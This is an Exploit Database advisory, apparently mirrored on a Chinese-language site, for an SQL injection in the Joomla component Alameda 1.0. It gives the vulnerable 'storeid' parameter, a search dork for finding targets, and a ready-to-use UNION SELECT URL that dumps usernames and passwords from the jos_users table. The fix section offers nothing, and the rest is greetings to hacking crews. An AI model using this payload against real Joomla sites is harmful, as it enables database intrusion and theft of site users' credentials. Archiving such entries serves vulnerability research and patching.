Joomla! Component Alameda 1.0 – SQL Injection

• Exploit Database
• 11 阅读

• 作者： kaMtiEz
  日期： 2011-10-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18058/

• [~] Joomla Component Alameda (com_alameda) SQL Injection Vulnerability 
  [~] Author : kaMtiEz (kamtiez@exploit-id.com)
  [~] Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id 
  [~] Date : 1 Nov , 2011
   
  [ Software Information ]
   
  [+] Vendor : http://www.blueflyingfish.com/alameda/
  [+] INFO : http://extensions.joomla.org/extensions/e-commerce/e-commerce-bridges/18018
  [+] Download : http://www.blueflyingfish.com/alameda/index.php?option=com_content&view=article&id=3
  [+] version : 1.0 
  [+] Vulnerability : SQL INJECTION
  [+] Dork : "CiHuY"
  [+] LOCATION : - INDONESIA -
   
   
  [ Vulnerable File ]
   
  http://127.0.0.1/[kaMtiEz]/index.php?option=com_alameda&controller=comments&task=edit&storeid=1[SQL]
  
  [ XpL ]
   
  http://127.0.0.1/[kaMtiEz]/index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--
  
  [ FIX ]
   
  dunno :">
  
  [ Thx TO ]
   
  [+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
  [+] Tukulesto,arianom,el-farhatz,Jundab,ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,n4kuLa,t3ll0
  [+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpret0,Dr. Cruzz
  [+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz,pinpinbo dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D
   
  [ NOTE ]
  
  [+] Jika kau mengambil sebuah keputusan maka kau tidak boleh menyesalinya :-)
  [+] be yourself ;)
   
  [ QUOTE ]
   
  [+] INDONESIANCODER still r0x
  [+] nothing secure ..